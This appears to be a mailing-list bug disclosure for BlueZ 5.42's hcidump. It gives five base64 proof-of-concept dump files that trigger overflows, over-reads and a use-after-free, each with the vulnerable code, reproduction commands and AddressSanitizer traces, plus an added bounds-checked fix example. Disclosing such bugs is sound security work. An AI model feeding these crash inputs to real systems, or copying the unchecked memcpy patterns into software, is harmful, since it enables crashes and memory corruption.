Hello list,

I have been playing with the hcidump tool recently and came across the following bugs, coming from either out-of-bound reads or buffer overflows (see attached reports). There are a couple more I'm working on and will send these later.

Cheers,
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
An out-of-bounds read was identified in the "amp_dump_chanlist" function in the "tools/parser/amp.c" source file. The read at line 50 walks the channel-list triplets one byte past the end of the 54-byte L2CAP reassembly buffer allocated in l2cap_dump (see the ASan report). The issue can be triggered by processing a corrupted dump file and results in an hcidump crash. To replicate it, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
IAAqBfcQ/6LNFQA0AgUgFwIXAAEAERkgAE8VAf///4AcBADrAAACANIAAAABAAA9PggAav8HAD4+
IAAp2RlAAKKA0zQ0AgAAAAEXAAEABf9WAAAAIBkFAAEQAAAANPVq/wcAPj4gACnZGUAAooDTFTQC
AAAAARcAAQAF/1YAAAAgGQIAARAAAAA09fECFw4CAAEAAH8VAADe////6EABANM9Pgj3gP8HAD4+
IAAp+BlAAKKA0xU0AgAA8wEyAAMABf9WAAAAIBkNAAEQXQAANPXxAhcOAgABAAB/FQAAAAAAAABA
AQDTPT4IAID/BwA+PiAAKfgZQACiatMnNAIAGgDTPT4IAID+/QA+PiAACvgAGR8AA9EBAD4A/wA4
GhAA

Affected code:
45     for (i = 0; i < num; i++) {
46         triplet = &chan_list->triplets[i];
47
48         p_indent(level+2, 0);
49
50         if (triplet->chans.first_channel >= 201) {
51             printf("Reg ext id %d reg class %d coverage class %d\n",
52                 triplet->ext.reg_extension_id,
53                 triplet->ext.reg_class,
54                 triplet->ext.coverage_class);
55         } else {
56             if (triplet->chans.num_channels == 1)
57

Repeat-By:
echo "<above base64>" > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (BlueZ needs to be compiled with -fsanitize=address for this):
==27923==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000eff6 at pc 0x4a8615 bp 0x792d80053ec0 sp 0x792d80053eb8
READ of size 1 at 0x60600000eff6 thread T0
    #0 0x4a8614 in amp_dump_chanlist tools/parser/amp.c:50
    #1 0x4a8d58 in amp_assoc_dump tools/parser/amp.c:97
    #2 0x492df4 in a2mp_create_req tools/parser/l2cap.c:1183
    #3 0x492df4 in l2cap_parse tools/parser/l2cap.c:1382
    #4 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624
    #5 0x479c9c in acl_dump tools/parser/hci.c:4041
    #6 0x479c9c in hci_dump tools/parser/hci.c:4120
    #7 0x4035d4 in parse tools/parser/parser.h:260
    #8 0x4035d4 in read_dump tools/hcidump.c:425
    #9 0x4035d4 in main tools/hcidump.c:810
    #10 0x71c2389e7b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #11 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

0x60600000eff6 is located 0 bytes to the right of 54-byte region [0x60600000efc0,0x60600000eff6)
allocated by thread T0 here:
    #0 0x71c238dc573f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x4a50e7 in l2cap_dump tools/parser/l2cap.c:1581
    #2 0x1f

SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/amp.c:50 amp_dump_chanlist
Shadow bytes around the buggy address:
  0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0c7fff9df0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00[06]fa
  0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  Contiguous container OOB:fc
  ASan internal:         fe
==27923==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
An out-of-bounds read was observed in the "ba2str" function in the "lib/bluetooth.c" source file. ba2str is only the sink: its caller, extended_inq_result_dump (tools/parser/hci.c:3512), passes it a bdaddr that lies 28 bytes past the end of the 1500-byte read buffer allocated in read_dump, as the ASan report shows. The issue can be triggered by processing a corrupted dump file and results in an hcidump crash. To replicate it, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
oAVArgAAAPjzAwABBC8FHv0MAAAAAIAD5gEAPpcWGkYaPrrYA8QBADA+Rz5aBAAAAgAAAP9/ANUX
GjYS/38aOxo+uvgDEAEAZAD//wByAUQEGBo+fwAKBAEAEiQ+PlgaPrrYAwQBAP9/AwAYGj4AAAAB
AQAAAAAAACAButgDhAEAAQEBAQEBAQEBEAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEB
AQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBugADBAEAMD4oPlgAAR8AAQEAugADBDMkPkJY
AAG62AOEATgaProgAwQBAGQAAAAAIBI+PjwAAAAAEAABAD4ABJUAAAAEALoAAwAABQA+WL0QAAEf
AA7mAQA8CAQaPiw+utgDBO8AMD4+PlgABf//BeYBAD4ABBY+QD7//2sEAQAFPj5GWAY+uugDBAEA
Ej4+GjsaPrr4AxABAGQA5f8AcgFEBEoAAQASPj4+WBpJutgDBAEAEj4+PTw6ProeAwQBADA+KD5Y
AAEfAAPmAQA+lxYaPho+utiTBAEO5gEAPggEGj4sPrqYAwQBADA+Pj5YAAEfrQPmkQA+AAQWPkA+
//8DBAEABT4+PVgGPrroAwQBABI+Pho4Gj66IAMEAQBkAAAAACASPj48ADo+ugADBAEAMD4oPrrY
AwQBAP+PAAAYGj5YAAEf4gIAAQA+AASVAAAABAC6AAMA/////1i9EAABHwAO5gEA6AMAAD4sPrrY
AwQBADA+Pj5YAAX//yw+utgDBAEAMD4+PlgAAR8+ugADBAEAutiTBAEO5gEAPggEGj4sPrrYAwQB
IzA+Pj5YAAEfrQPmAQA+AAQWHv0MAPMBLD662AME+AAwPj4uWAAF//8sPrrYAwQBADA+Oz5YAAEf
rQPmAQA+AAQWPkA+//8DBAEABT4+PVgGPrroAwQBABI+Pho4Gj66+AMEARBkAAMEARYSPj49ADo+
ugADBAEAGj662AMEAQD/fwMAGBo+AAAAAQEAAAAAgFgAAbrYA4QBAAEBAQEBAQEBAQEBAQEBAQEB
AQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAdYA
AwQBADA+KD5YAAEfAAEBALgAAwQzJGBCWAABAAAAIAEAEj4+PR0aOroAAwQBADA+Pj5YAAEfAAMA
AQA+AASVAAAABAC6AQMAIP///1i9EAABJwAO5gEA6AEAAD4sPrrYAwQBADA+Pj5YAAX//yw+utgD
BAEAMD4+PlgAAR+tA+YBAD4ABBY+QD7//wMEAQAFPj49WAY+uugDBAEAEj4+GjgaPrr4AwQBAGQA
AwQBABI+Pj0AOj66AAMEAQAwPig+utgDBAABAQAzJD4+WAADhAEAEj4+PTwaOgAQAAAfAAMAAQA+
AAQaOBo+uvgDBAEAZAD//wAAAAEESgABAP9/AAAYGj4AAAABAQAzJD4+WAAButgDlwEAEj4+PXwa
OrnuAwEAAFgAAbrYA4QBABI+Pj08Gjq6AAMEAQAwPj4+WACPHwADAAEAPgAElQAAAAQAugADAAAF
AD5YvRAAAR8ADuYBAD4IBBo+LD662AMEAQAwPj4+WAAF//8F5gEAPgAEFj5APv//AwQBAAU+PkZY
Bj666AMEAQASPj4aOxo+uvgDEAEAZADl/wByAUQEShMBABI+Pj5YGj662AMEAQASPj48PDo+uh4D
BAEAMD4oPlgAAR8AIOYBAD6XFho+Gj662JMEAQ7mAQA+CAQaPiw+utgDBAEAMD4+PlgAAR+tA+aR
AD4ABBY+QD7//wMEAQAFPj49WAY+uugDBAEAEj4+GjgaProgAwQBAGQA/wAAABI+PjwAAAAAEAME
AQA1Pig+utgDBAEA/40AABgaPlgAAR8AAwABAD4ABJUAAAAEALoAAwD/////WL0QAAEfAA7l7wDo
AwAAPiw+utgDBAEAMD4+PlgABf//LD662AMEAQAwPj4+WAD/Hj66AAMEAQAwPj4+bAABHwADAAEA
PhcEGjgA/+gDGj66AH8EAQASJD4+WBo+ug==

Affected code:
77 int ba2str(const bdaddr_t *ba, char *str)
78 {
79     return sprintf(str, "%2.2X:%2.2X:%2.2X:%2.2X:%2.2X:%2.2X",
80         ba->b[5], ba->b[4], ba->b[3], ba->b[2], ba->b[1], ba->b[0]);
81 }

Repeat-By:
echo "<above base64>" > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (BlueZ needs to be compiled with -fsanitize=address for this):
==19853==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f778 at pc 0x580ae5 bp 0x7342a57f5cf0 sp 0x7342a57f5ce8
READ of size 1 at 0x61b00001f778 thread T0
    #0 0x580ae4 in ba2str lib/bluetooth.c:80
    #1 0x43f407 in p_ba2str tools/parser/parser.h:159
    #2 0x43f407 in extended_inq_result_dump tools/parser/hci.c:3512
    #3 0x481246 in event_dump tools/parser/hci.c:3963
    #4 0x481246 in hci_dump tools/parser/hci.c:4116
    #5 0x4035d4 in parse tools/parser/parser.h:260
    #6 0x4035d4 in read_dump tools/hcidump.c:425
    #7 0x4035d4 in main tools/hcidump.c:810
    #8 0x72dfc0e31b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #9 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

0x61b00001f778 is located 28 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c)
allocated by thread T0 here:
    #0 0x72dfc120f73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x402f12 in read_dump tools/hcidump.c:288
    #2 0x402f12 in main tools/hcidump.c:810

SUMMARY: AddressSanitizer: heap-buffer-overflow lib/bluetooth.c:80 ba2str
Shadow bytes around the buggy address:
  0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbee0: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa[fa]
  0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  Contiguous container OOB:fc
  ASan internal:         fe
==19853==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
A stack buffer overflow was observed in the "commands_dump" function in the "tools/parser/csr.c" source file. The issue exists because frm->len bytes are copied from frm->ptr into the 64-byte "commands" array without checking frm->len against the size of the array (the ASan report shows a 69-byte write, five bytes into the stack redzone). The issue can be triggered by processing a corrupted dump file and results in an hcidump crash. To replicate it, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
IAAqEAAQACDNAAIEAg7/AAEQEJABgEUKAAAD6LcAIP4GhwH/5mB5f3ME2wABABYaPhI+uj66AGUE
WQApP0Y+hRo+ugADBP8AggUSEhISEgNwIOkGAQD/f84AGBo+uvwDBAED6D4+PlgAAR8AA+YBPj5I
Gj662AMEAQD/nAAAA+YBAAADBAEAEiPlAAEAPrrYAwQBAP9/AAAYGj4AABgBAQAzJD4+WP8ButgD
hAEHEj4+PTwaOroAAwQBADA+Pj5YAAEfAAMAAQA+AAQaOBo+uvgDBAEAZAA+Uxo+utgDBD4+WAAB
HwAD5gEAPpfT/wA=

Affected code:
143 static inline void commands_dump(int level, char *str, struct frame *frm)
144 {
145     unsigned char commands[64];
146     unsigned int i;
147
148     memcpy(commands, frm->ptr, frm->len);
149
150     p_indent(level, frm);
151     printf("%s: commands", str);
152     for (i = 0; i < frm->len; i++)
153         printf(" 0x%02x", commands[i]);
154     printf("\n");
155 }

Repeat-By:
echo "<above base64>" > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (BlueZ needs to be compiled with -fsanitize=address for this):
==20429==ERROR: AddressSanitizer: unknown-crash on address 0x7fc28f471400 at pc 0x570527 bp 0x7fc28f471250 sp 0x7fc28f471248
WRITE of size 69 at 0x7fc28f471400 thread T0
    #0 0x570526 in commands_dump tools/parser/csr.c:148
    #1 0x570526 in pskey_dump tools/parser/csr.c:284
    #2 0x576cae in bccmd_dump tools/parser/csr.c:496
    #3 0x57d48a in csr_dump tools/parser/csr.c:569
    #4 0x482b5e in event_dump tools/parser/hci.c:3823
    #5 0x482b5e in hci_dump tools/parser/hci.c:4116
    #6 0x4035d4 in parse tools/parser/parser.h:260
    #7 0x4035d4 in read_dump tools/hcidump.c:425
    #8 0x4035d4 in main tools/hcidump.c:810
    #9 0x71b152861b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

Address 0x7fc28f471400 is located in stack of thread T0 at offset 384 in frame
    #0 0x5661ff in pskey_dump tools/parser/csr.c:239

  This frame has 6 object(s):
    [32, 38) 'b'
    [96, 104) 'features'
    [160, 168) 't'
    [224, 242) 'addr'
    [288, 344) 'tm'
    [384, 448) 'commands' <== Memory access at offset 384 partially overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: unknown-crash tools/parser/csr.c:148 commands_dump
Shadow bytes around the buggy address:
  0x0ff8d1e86230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff8d1e86240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff8d1e86250: f1 f1 f1 f1 06 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4
  0x0ff8d1e86260: f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 00 02 f4
  0x0ff8d1e86270: f2 f2 f2 f2 00 00 00 00 00 00 00 f4 f2 f2 f2 f2
=>0x0ff8d1e86280:[00]00 00 00 00 00 00 00 f3 f3 f3 f3 00 00 00 00
  0x0ff8d1e86290: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
  0x0ff8d1e862a0: 00 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00 00 f4
  0x0ff8d1e862b0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff8d1e862c0: f1 f1 f1 f1 06 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4
  0x0ff8d1e862d0: f2 f2 f2 f2 00 00 02 f4 f2 f2 f2 f2 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  Contiguous container OOB:fc
  ASan internal:         fe
==20429==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
A use-after-free was identified in the "conf_opt" function in the "tools/parser/l2cap.c" source file. The option walk at line 644 advances ptr by the attacker-controlled h->len without checking that an option header still fits in the remaining len; the shadow bytes in the ASan report show the read landing in a freed chunk (a string allocated by lmp_vertostr and released by read_remote_version_complete_dump) that sits directly after the live buffer. The issue can be triggered by processing a corrupted dump file and results in an hcidump crash. To replicate it, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
IAAIl48QJQQEBIAEBAzyAJCQj0QAkJ6P9gEAkJAT0yAA6v8A/3+PfwAAAQABAAA9PggAav8HAD4+
IAAp2RlAAKKA0xU0AgAAAAEQAAEABf9WAAAAIBkCAAEQAAAANABq/wcAPj4gACnZGUAAooDTFTQC
AAAAARcAAQAF/1YAAAAgGQIAARAAAAA49fECFw4CAAEAAH8VAAD79v8AAEABANM9PggAgP8HAAU+
IAAp+BlAAKKA0xU0AgAA8wEyAAEABf//fxoAIBkCAAEQAAAANPXxAhcOAgABAAB/FQAAAAAAAABA
AQDTPT4IAID/BwA+PiAAKfgZQACigNMVNAIAGgDTPT4KAID/BwA+PiAAKfgAARAAAAAABQABAAA9
Pv//AAABFwABAAX/VgAA

Affected code:
636 static void conf_opt(int level, void *ptr, int len, int in, uint16_t handle,
637                     uint16_t cid)
638 {
639     int indent = 0;
640     p_indent(level, 0);
641     while (len > 0) {
642         l2cap_conf_opt *h = ptr;
643
644         ptr += L2CAP_CONF_OPT_SIZE + h->len;
645         len -= L2CAP_CONF_OPT_SIZE + h->len;
646
647         if (h->type & 0x80)
648             printf("[");
649
650         if (indent++) {
651             printf("\n");
652             p_indent(level, 0);
653         }

Repeat-By:
echo "<above base64>" > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (BlueZ needs to be compiled with -fsanitize=address for this):
==27419==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000efd4 at pc 0x48d77a bp 0x72b7bc0bf2b0 sp 0x72b7bc0bf2a8
READ of size 1 at 0x60600000efd4 thread T0
    #0 0x48d779 in conf_opt tools/parser/l2cap.c:644
    #1 0x498a05 in conf_rsp tools/parser/l2cap.c:781
    #2 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256
    #3 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624
    #4 0x479c9c in acl_dump tools/parser/hci.c:4041
    #5 0x479c9c in hci_dump tools/parser/hci.c:4120
    #6 0x4035d4 in parse tools/parser/parser.h:260
    #7 0x4035d4 in read_dump tools/hcidump.c:425
    #8 0x4035d4 in main tools/hcidump.c:810
    #9 0x6f259422cb44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

0x60600000efd4 is located 20 bytes inside of 50-byte region [0x60600000efc0,0x60600000eff2)
freed by thread T0 here:
    #0 0x6f259460a527 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54527)
    #1 0x483696 in read_remote_version_complete_dump tools/parser/hci.c:3200
    #2 0x483696 in event_dump tools/parser/hci.c:3902
    #3 0x483696 in hci_dump tools/parser/hci.c:4116

previously allocated by thread T0 here:
    #0 0x6f259460a73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x58f374 in hci_uint2str lib/hci.c:100
    #2 0x58f374 in lmp_vertostr lib/hci.c:675

SUMMARY: AddressSanitizer: heap-use-after-free tools/parser/l2cap.c:644 conf_opt
Shadow bytes around the buggy address:
  0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
=>0x0c0c7fff9df0: 00 00 06 fa fa fa fa fa fd fd[fd]fd fd fd fd fa
  0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  Contiguous container OOB:fc
  ASan internal:         fe
==27419==ABORTING
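The conf_opt loop above reads h->type and h->len, then advances ptr by L2CAP_CONF_OPT_SIZE + h->len, with no check that either the two-byte header or the claimed value length is still inside the buffer. The following is an added example, not code from the bug report or from BlueZ, of how a TLV walk of that shape looks with both checks in place. The header layout (one type byte, one length byte, then the value) mirrors the parser's l2cap_conf_opt, and the sample option bytes are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Option header as the parser's l2cap_conf_opt lays it out: type byte,
 * length byte, then `len` value bytes (L2CAP_CONF_OPT_SIZE in hcidump). */
#define CONF_OPT_HDR_SIZE 2

/* Walk a configuration option list. Returns the number of options found, or
 * -1 if a header or an option value runs past the end of the buffer. */
int walk_conf_opts(const uint8_t *buf, size_t len, int verbose)
{
    size_t off = 0;
    int count = 0;

    while (off < len) {
        /* conf_opt reads h->type and h->len before checking that two bytes
         * remain; a single trailing byte is enough for a one-byte over-read. */
        if (len - off < CONF_OPT_HDR_SIZE)
            return -1;
        uint8_t type = buf[off];
        uint8_t olen = buf[off + 1];

        /* conf_opt does `ptr += L2CAP_CONF_OPT_SIZE + h->len` unconditionally;
         * an olen larger than the remainder would point past the buffer. */
        if (olen > len - off - CONF_OPT_HDR_SIZE)
            return -1;

        if (verbose)
            printf("%sopt type 0x%02x len %u\n",
                   (type & 0x80) ? "[hint] " : "", type & 0x7f, olen);

        off += CONF_OPT_HDR_SIZE + olen;
        count++;
    }
    return count;
}

int main(void)
{
    /* Constructed: an MTU option (type 1, len 2) followed by a 1-byte option. */
    static const uint8_t good[] = { 0x01, 0x02, 0x00, 0x04, 0x04, 0x01, 0x03 };
    /* Constructed: the length byte claims 2 value bytes but only 1 is present. */
    static const uint8_t bad[]  = { 0x01, 0x02, 0x00 };

    printf("good: %d option(s)\n", walk_conf_opts(good, sizeof good, 1));
    printf("bad: %d\n", walk_conf_opts(bad, sizeof bad, 0));
    return 0;
}
```

The second check is the one that matters for the report above: once olen is bounded by what remains, off can never leave the buffer, so the next iteration's header read is always inside it, whatever sits in the adjacent heap chunk.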
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz

Description:
A heap buffer over-read was observed in the "l2cap_dump" function in the "tools/parser/l2cap.c" source file. The memcpy at line 1585 copies frm->len bytes into the reassembly buffer without checking frm->len against the buffer's size; the ASan report shows a copy of 4294967295 bytes, consistent with a negative frm->len converted to size_t, reading past the 1500-byte read buffer allocated in read_dump. The issue can be triggered by processing a corrupted dump file and results in an hcidump crash. To replicate it, use the attached sample below and execute the following command:

./tools/hcidump -a -r <PoC File>

PoC.file base64 encoded:
BAAqBRkQAKLNFRU0AgIHFwIXAAEABRkgAAAANAI9WAY+uugDPj4+WBo6utgDBAEA/5wAADgaProA
AwQB

Affected code:
1570     }
1571
1572     if (!(fr = get_frame(frm->handle))) {
1573         fprintf(stderr, "Not enough connection handles\n");
1574         raw_dump(level, frm);
1575         return;
1576     }
1577
1578     if (fr->data)
1579         free(fr->data);
1580
1581     if (!(fr->data = malloc(dlen + L2CAP_HDR_SIZE))) {
1582         perror("Can't allocate L2CAP reassembly buffer");
1583         return;
1584     }
1585     memcpy(fr->data, frm->ptr, frm->len);
1586     fr->data_len = dlen + L2CAP_HDR_SIZE;
1587     fr->len = frm->len;
1588     fr->ptr = fr->data;
1589     fr->dev_id = frm->dev_id;
1590     fr->in = frm->in;

Repeat-By:
echo "<above base64>" > PoC.b64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file

ASAN Report (BlueZ needs to be compiled with -fsanitize=address for this):
==17644==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f75c at pc 0x79c51d04e792 bp 0x79f5616c33d0 sp 0x79f5616c2b90
READ of size 4294967295 at 0x61b00001f75c thread T0
    #0 0x79c51d04e791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
    #1 0x4a52d2 in l2cap_dump tools/parser/l2cap.c:1585
    #2 0x479c9c in acl_dump tools/parser/hci.c:4041
    #3 0x479c9c in hci_dump tools/parser/hci.c:4120
    #4 0x4035d4 in parse tools/parser/parser.h:260
    #5 0x4035d4 in read_dump tools/hcidump.c:425
    #6 0x4035d4 in main tools/hcidump.c:810
    #7 0x79c51cc96b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #8 0x40529e (/opt/bluez/tools/hcidump+0x40529e)

0x61b00001f75c is located 0 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c)
allocated by thread T0 here:
    #0 0x79c51d07473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x402f12 in read_dump tools/hcidump.c:288
    #2 0x402f12 in main tools/hcidump.c:810

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbee0: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
  0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  Contiguous container OOB:fc
  ASan internal:         fe
==17644==ABORTING
